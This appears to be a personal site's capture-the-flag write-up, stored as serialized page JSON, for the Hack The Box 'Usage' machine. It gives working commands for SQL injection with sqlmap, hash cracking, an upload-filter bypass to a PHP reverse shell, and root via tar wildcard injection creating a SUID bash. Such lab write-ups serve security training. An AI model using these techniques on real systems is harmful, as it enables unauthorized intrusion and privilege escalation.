[{"data":1,"prerenderedAt":579},["ShallowReactive",2],{"search":3,"recent-machines":28,"machine-\u002Fmachines\u002Fhtb-usage":35},[4,8,12,16,20,24],{"_path":5,"title":6,"image":7},"\u002Fmachines\u002Fhtb-boardlight","BoardLight","\u002Fimg\u002Fmachines\u002Fhtb-boardlight\u002Fcover.png",{"_path":9,"title":10,"image":11},"\u002Fmachines\u002Fhtb-headless","Headless","\u002Fimg\u002Fmachines\u002Fhtb-headless\u002Fcover.png",{"_path":13,"title":14,"image":15},"\u002Fmachines\u002Fhtb-usage","Usage","\u002Fimg\u002Fmachines\u002Fhtb-usage\u002Fcover.png",{"_path":17,"title":18,"image":19},"\u002Fmachines\u002Fthm-containment","ContAInment","\u002Fimg\u002Fmachines\u002Fthm-containment\u002Fcover.png",{"_path":21,"title":22,"image":23},"\u002Fprojects\u002Fmaddox","Maddox","\u002Fimg\u002Fprojects\u002Fmaddox\u002Fcover.png",{"_path":25,"title":26,"image":27},"\u002Fprojects\u002Fsentinel","Sentinel Password Manager","\u002Fimg\u002Fprojects\u002Fsentinel\u002Fcover.png",[29,31,33,34],{"_path":17,"title":18,"difficulty":30},"Medium",{"_path":13,"title":14,"difficulty":32},"Easy",{"_path":9,"title":10,"difficulty":32},{"_path":5,"title":6,"difficulty":32},{"_path":13,"_dir":36,"_draft":37,"_partial":37,"_locale":38,"title":14,"description":39,"difficulty":32,"platform":40,"os":41,"date":42,"image":15,"tags":43,"body":46,"_type":573,"_id":574,"_source":575,"_file":576,"_stem":577,"_extension":578},"machines",false,"","Easy Linux machine involving SQL Injection and password reset token exploitation.","HTB","Linux","2026-04-02",[40,41,32,44,45],"SQLi","Web",{"type":47,"children":48,"toc":567},"root",[49,58,64,114,119,145,151,172,177,183,196,230,243,277,290,303,328,340,360,366,386,415,436,502,515,551,561],{"type":50,"tag":51,"props":52,"children":54},"element","h2",{"id":53},"reconnaissance",[55],{"type":56,"value":57},"text","Reconnaissance",{"type":50,"tag":59,"props":60,"children":61},"p",{},[62],{"type":56,"value":63},"Starting with our initial Nmap 
scan:",{"type":50,"tag":65,"props":66,"children":70},"pre",{"className":67,"code":68,"language":69,"meta":38,"style":38},"language-bash shiki shiki-themes github-dark","nmap -sC -sV -oN nmap\u002Finitial 10.10.11.18\n","bash",[71],{"type":50,"tag":72,"props":73,"children":74},"code",{"__ignoreMap":38},[75],{"type":50,"tag":76,"props":77,"children":80},"span",{"class":78,"line":79},"line",1,[81,87,93,98,103,109],{"type":50,"tag":76,"props":82,"children":84},{"style":83},"--shiki-default:#B392F0",[85],{"type":56,"value":86},"nmap",{"type":50,"tag":76,"props":88,"children":90},{"style":89},"--shiki-default:#79B8FF",[91],{"type":56,"value":92}," -sC",{"type":50,"tag":76,"props":94,"children":95},{"style":89},[96],{"type":56,"value":97}," -sV",{"type":50,"tag":76,"props":99,"children":100},{"style":89},[101],{"type":56,"value":102}," -oN",{"type":50,"tag":76,"props":104,"children":106},{"style":105},"--shiki-default:#9ECBFF",[107],{"type":56,"value":108}," nmap\u002Finitial",{"type":50,"tag":76,"props":110,"children":111},{"style":89},[112],{"type":56,"value":113}," 10.10.11.18\n",{"type":50,"tag":59,"props":115,"children":116},{},[117],{"type":56,"value":118},"The scan reveals two open ports:",{"type":50,"tag":120,"props":121,"children":122},"ul",{},[123,135],{"type":50,"tag":124,"props":125,"children":126},"li",{},[127,133],{"type":50,"tag":128,"props":129,"children":130},"strong",{},[131],{"type":56,"value":132},"Port 22",{"type":56,"value":134}," — SSH",{"type":50,"tag":124,"props":136,"children":137},{},[138,143],{"type":50,"tag":128,"props":139,"children":140},{},[141],{"type":56,"value":142},"Port 80",{"type":56,"value":144}," — HTTP",{"type":50,"tag":51,"props":146,"children":148},{"id":147},"enumeration",[149],{"type":56,"value":150},"Enumeration",{"type":50,"tag":59,"props":152,"children":153},{},[154,156,162,164,170],{"type":56,"value":155},"We add 
",{"type":50,"tag":72,"props":157,"children":159},{"className":158},[],[160],{"type":56,"value":161},"usage.htb",{"type":56,"value":163}," to our ",{"type":50,"tag":72,"props":165,"children":167},{"className":166},[],[168],{"type":56,"value":169},"\u002Fetc\u002Fhosts",{"type":56,"value":171}," file and browse to port 80, where we find a blog website with user registration and login functionality.",{"type":50,"tag":59,"props":173,"children":174},{},[175],{"type":56,"value":176},"Trying basic SQL injection payloads on the login page bypasses the authentication or results in an error. We realize the password reset function is vulnerable to SQL injection.",{"type":50,"tag":51,"props":178,"children":180},{"id":179},"foothold",[181],{"type":56,"value":182},"Foothold",{"type":50,"tag":59,"props":184,"children":185},{},[186,188,194],{"type":56,"value":187},"Using ",{"type":50,"tag":72,"props":189,"children":191},{"className":190},[],[192],{"type":56,"value":193},"sqlmap",{"type":56,"value":195}," on the password reset endpoint, we map out the database:",{"type":50,"tag":65,"props":197,"children":199},{"className":67,"code":198,"language":69,"meta":38,"style":38},"sqlmap -r request.txt --batch --dbs\n",[200],{"type":50,"tag":72,"props":201,"children":202},{"__ignoreMap":38},[203],{"type":50,"tag":76,"props":204,"children":205},{"class":78,"line":79},[206,210,215,220,225],{"type":50,"tag":76,"props":207,"children":208},{"style":83},[209],{"type":56,"value":193},{"type":50,"tag":76,"props":211,"children":212},{"style":89},[213],{"type":56,"value":214}," -r",{"type":50,"tag":76,"props":216,"children":217},{"style":105},[218],{"type":56,"value":219}," request.txt",{"type":50,"tag":76,"props":221,"children":222},{"style":89},[223],{"type":56,"value":224}," --batch",{"type":50,"tag":76,"props":226,"children":227},{"style":89},[228],{"type":56,"value":229}," --dbs\n",{"type":50,"tag":59,"props":231,"children":232},{},[233,235,241],{"type":56,"value":234},"The database contains 
user credentials, including an administrator hash. We crack the hash using ",{"type":50,"tag":72,"props":236,"children":238},{"className":237},[],[239],{"type":56,"value":240},"hashcat",{"type":56,"value":242},":",{"type":50,"tag":65,"props":244,"children":246},{"className":67,"code":245,"language":69,"meta":38,"style":38},"hashcat -m 3200 hash.txt rockyou.txt\n",[247],{"type":50,"tag":72,"props":248,"children":249},{"__ignoreMap":38},[250],{"type":50,"tag":76,"props":251,"children":252},{"class":78,"line":79},[253,257,262,267,272],{"type":50,"tag":76,"props":254,"children":255},{"style":83},[256],{"type":56,"value":240},{"type":50,"tag":76,"props":258,"children":259},{"style":89},[260],{"type":56,"value":261}," -m",{"type":50,"tag":76,"props":263,"children":264},{"style":89},[265],{"type":56,"value":266}," 3200",{"type":50,"tag":76,"props":268,"children":269},{"style":105},[270],{"type":56,"value":271}," hash.txt",{"type":50,"tag":76,"props":273,"children":274},{"style":105},[275],{"type":56,"value":276}," rockyou.txt\n",{"type":50,"tag":59,"props":278,"children":279},{},[280,282,288],{"type":56,"value":281},"Logging in as the admin, we find an option to upload an avatar. 
The file upload functionality has a bypass that permits uploading PHP files disguised as images (e.g., using a ",{"type":50,"tag":72,"props":283,"children":285},{"className":284},[],[286],{"type":56,"value":287},".php.jpg",{"type":56,"value":289}," extension and modifying the magic bytes).",{"type":50,"tag":59,"props":291,"children":292},{},[293,295,301],{"type":56,"value":294},"We upload a standard PHP reverse shell and trigger it by navigating to ",{"type":50,"tag":72,"props":296,"children":298},{"className":297},[],[299],{"type":56,"value":300},"\u002Fuploads\u002Fprofile.php",{"type":56,"value":302},".",{"type":50,"tag":65,"props":304,"children":306},{"className":67,"code":305,"language":69,"meta":38,"style":38},"nc -lvnp 4444\n",[307],{"type":50,"tag":72,"props":308,"children":309},{"__ignoreMap":38},[310],{"type":50,"tag":76,"props":311,"children":312},{"class":78,"line":79},[313,318,323],{"type":50,"tag":76,"props":314,"children":315},{"style":83},[316],{"type":56,"value":317},"nc",{"type":50,"tag":76,"props":319,"children":320},{"style":89},[321],{"type":56,"value":322}," -lvnp",{"type":50,"tag":76,"props":324,"children":325},{"style":89},[326],{"type":56,"value":327}," 4444\n",{"type":50,"tag":59,"props":329,"children":330},{},[331,333,339],{"type":56,"value":332},"We receive a shell as the user ",{"type":50,"tag":72,"props":334,"children":336},{"className":335},[],[337],{"type":56,"value":338},"dash",{"type":56,"value":302},{"type":50,"tag":65,"props":341,"children":343},{"className":67,"code":342,"language":69,"meta":38,"style":38},"cat \u002Fhome\u002Fdash\u002Fuser.txt\n",[344],{"type":50,"tag":72,"props":345,"children":346},{"__ignoreMap":38},[347],{"type":50,"tag":76,"props":348,"children":349},{"class":78,"line":79},[350,355],{"type":50,"tag":76,"props":351,"children":352},{"style":83},[353],{"type":56,"value":354},"cat",{"type":50,"tag":76,"props":356,"children":357},{"style":105},[358],{"type":56,"value":359}," 
\u002Fhome\u002Fdash\u002Fuser.txt\n",{"type":50,"tag":51,"props":361,"children":363},{"id":362},"privilege-escalation",[364],{"type":56,"value":365},"Privilege Escalation",{"type":50,"tag":59,"props":367,"children":368},{},[369,371,377,379,385],{"type":56,"value":370},"Enumerating the system, we check processes and cron jobs. We find an interesting backup script running periodically as root. The script uses the wildcard ",{"type":50,"tag":72,"props":372,"children":374},{"className":373},[],[375],{"type":56,"value":376},"*",{"type":56,"value":378}," to compress files in a directory using ",{"type":50,"tag":72,"props":380,"children":382},{"className":381},[],[383],{"type":56,"value":384},"tar",{"type":56,"value":302},{"type":50,"tag":65,"props":387,"children":389},{"className":67,"code":388,"language":69,"meta":38,"style":38},"cat \u002Fusr\u002Flocal\u002Fbin\u002Fbackup.sh\n# tar -czf \u002Fvar\u002Fbackups\u002Fbackup.tar.gz *\n",[390],{"type":50,"tag":72,"props":391,"children":392},{"__ignoreMap":38},[393,405],{"type":50,"tag":76,"props":394,"children":395},{"class":78,"line":79},[396,400],{"type":50,"tag":76,"props":397,"children":398},{"style":83},[399],{"type":56,"value":354},{"type":50,"tag":76,"props":401,"children":402},{"style":105},[403],{"type":56,"value":404}," \u002Fusr\u002Flocal\u002Fbin\u002Fbackup.sh\n",{"type":50,"tag":76,"props":406,"children":408},{"class":78,"line":407},2,[409],{"type":50,"tag":76,"props":410,"children":412},{"style":411},"--shiki-default:#6A737D",[413],{"type":56,"value":414},"# tar -czf \u002Fvar\u002Fbackups\u002Fbackup.tar.gz *\n",{"type":50,"tag":59,"props":416,"children":417},{},[418,420,426,428,434],{"type":56,"value":419},"This is vulnerable to a classic wildcard injection. 
The shell expands * to every file name in the directory before tar starts, and tar parses any name that begins with -- as an option rather than a file; writing the pattern as .\u002F* or placing -- before it would prevent this. We create two files named ",{"type":50,"tag":72,"props":421,"children":423},{"className":422},[],[424],{"type":56,"value":425},"--checkpoint=1",{"type":56,"value":427}," and ",{"type":50,"tag":72,"props":429,"children":431},{"className":430},[],[432],{"type":56,"value":433},"--checkpoint-action=exec=sh exploit.sh",{"type":56,"value":435}," in the directory being backed up.",{"type":50,"tag":65,"props":437,"children":439},{"className":67,"code":438,"language":69,"meta":38,"style":38},"echo \"cp \u002Fbin\u002Fbash \u002Ftmp\u002Fbash; chmod +s \u002Ftmp\u002Fbash\" > exploit.sh\ntouch -- \"--checkpoint=1\"\ntouch -- \"--checkpoint-action=exec=sh exploit.sh\"\n",[440],{"type":50,"tag":72,"props":441,"children":442},{"__ignoreMap":38},[443,467,485],{"type":50,"tag":76,"props":444,"children":445},{"class":78,"line":79},[446,451,456,462],{"type":50,"tag":76,"props":447,"children":448},{"style":89},[449],{"type":56,"value":450},"echo",{"type":50,"tag":76,"props":452,"children":453},{"style":105},[454],{"type":56,"value":455}," \"cp \u002Fbin\u002Fbash \u002Ftmp\u002Fbash; chmod +s \u002Ftmp\u002Fbash\"",{"type":50,"tag":76,"props":457,"children":459},{"style":458},"--shiki-default:#F97583",[460],{"type":56,"value":461}," >",{"type":50,"tag":76,"props":463,"children":464},{"style":105},[465],{"type":56,"value":466}," exploit.sh\n",{"type":50,"tag":76,"props":468,"children":469},{"class":78,"line":407},[470,475,480],{"type":50,"tag":76,"props":471,"children":472},{"style":83},[473],{"type":56,"value":474},"touch",{"type":50,"tag":76,"props":476,"children":477},{"style":89},[478],{"type":56,"value":479}," --",{"type":50,"tag":76,"props":481,"children":482},{"style":105},[483],{"type":56,"value":484}," 
\"--checkpoint=1\"\n",{"type":50,"tag":76,"props":486,"children":488},{"class":78,"line":487},3,[489,493,497],{"type":50,"tag":76,"props":490,"children":491},{"style":83},[492],{"type":56,"value":474},{"type":50,"tag":76,"props":494,"children":495},{"style":89},[496],{"type":56,"value":479},{"type":50,"tag":76,"props":498,"children":499},{"style":105},[500],{"type":56,"value":501}," \"--checkpoint-action=exec=sh exploit.sh\"\n",{"type":50,"tag":59,"props":503,"children":504},{},[505,507,513],{"type":56,"value":506},"Once the cron job executes, it runs our ",{"type":50,"tag":72,"props":508,"children":510},{"className":509},[],[511],{"type":56,"value":512},"exploit.sh",{"type":56,"value":514}," script with root privileges, giving SUID permissions to our copy of bash.",{"type":50,"tag":65,"props":516,"children":518},{"className":67,"code":517,"language":69,"meta":38,"style":38},"\u002Ftmp\u002Fbash -p\nwhoami\n# root\n",[519],{"type":50,"tag":72,"props":520,"children":521},{"__ignoreMap":38},[522,535,543],{"type":50,"tag":76,"props":523,"children":524},{"class":78,"line":79},[525,530],{"type":50,"tag":76,"props":526,"children":527},{"style":83},[528],{"type":56,"value":529},"\u002Ftmp\u002Fbash",{"type":50,"tag":76,"props":531,"children":532},{"style":89},[533],{"type":56,"value":534}," -p\n",{"type":50,"tag":76,"props":536,"children":537},{"class":78,"line":407},[538],{"type":50,"tag":76,"props":539,"children":540},{"style":83},[541],{"type":56,"value":542},"whoami\n",{"type":50,"tag":76,"props":544,"children":545},{"class":78,"line":487},[546],{"type":50,"tag":76,"props":547,"children":548},{"style":411},[549],{"type":56,"value":550},"# root\n",{"type":50,"tag":59,"props":552,"children":553},{},[554,559],{"type":50,"tag":128,"props":555,"children":556},{},[557],{"type":56,"value":558},"Root flag captured!",{"type":56,"value":560}," 🏴",{"type":50,"tag":562,"props":563,"children":564},"style",{},[565],{"type":56,"value":566},"html .default .shiki span {color: 
var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}",{"title":38,"searchDepth":407,"depth":407,"links":568},[569,570,571,572],{"id":53,"depth":407,"text":57},{"id":147,"depth":407,"text":150},{"id":179,"depth":407,"text":182},{"id":362,"depth":407,"text":365},"markdown","content:machines:htb-usage.md","content","machines\u002Fhtb-usage.md","machines\u002Fhtb-usage","md",1777047342074]